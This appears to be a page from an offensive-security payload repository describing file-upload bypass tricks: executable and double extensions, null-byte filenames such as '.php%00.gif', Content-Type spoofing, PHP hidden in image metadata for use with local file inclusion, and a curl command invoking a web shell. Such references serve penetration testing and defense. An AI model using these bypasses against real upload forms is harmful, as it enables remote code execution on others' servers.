e61db57ff1
fixed indentation |
||
---|---|---|
.. | ||
CVE Ffmpeg HLS | ||
CVE ZIP Symbolic Link | ||
Configuration Apache .htaccess | ||
Configuration Busybox httpd.conf | ||
Configuration IIS web.config | ||
Configuration Python __init__.py | ||
EICAR | ||
Extension ASP | ||
Extension Flash | ||
Extension HTML | ||
Extension PDF JS | ||
Extension PHP | ||
Picture Image Magik | ||
Picture Metadata | ||
Picture Resize | ||
Server Side Include | ||
Zip Slip | ||
README.md |
README.md
Upload
Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.
Summary
Tools
Exploits
PHP Extension
.php
.php3
.php4
.php5
.php7
Less known extensions
.pht
.phar
.phpt
.pgif
.phtml
.phtm
Double extensions
.jpeg.php
.jpg.php
.png.php
Other extensions
asp : .asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0)
perl: .pl, .pm, .cgi, .lib
jsp : .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion: .cfm, .cfml, .cfc, .dbm
Upload tricks
-
Null byte (works well against
pathinfo()
)- .php%00.gif
- .php\x00.gif
- .php%00.png
- .php\x00.png
- .php%00.jpg
- .php\x00.jpg
-
Mime type, change
Content-Type : application/x-php
orContent-Type : application/octet-stream
toContent-Type : image/gif
Content-Type : image/gif
Content-Type : image/png
Content-Type : image/jpeg
-
Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application.
Picture upload with LFI
Valid pictures hosting PHP code. Upload the picture and use a local file inclusion to execute the code. The shell can be called with the following command : curl 'http://localhost/test.php?0=system' --data "1='ls'"
.
- Picture Metadata, hide the payload inside a comment tag in the metadata.
- Picture Resize, hide the payload within the compression algorithm in order to bypass a resize. Also defeating
getimagesize()
andimagecreatefromgif()
.
Configuration Files
- .htaccess
- web.config
- httpd.conf
- __init__.py
CVE - Image Tragik
HTTP Request
Reverse Shell
Touch command
References
- Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil
- BookFresh Tricky File Upload Bypass to RCE, NOV 29, 2014 - AHMED ABOUL-ELA
- Encoding Web Shells in PNG IDAT chunks, 04-06-2012, phil
- La PNG qui se prenait pour du PHP, 23 février 2014
- File Upload restrictions bypass - Haboob Team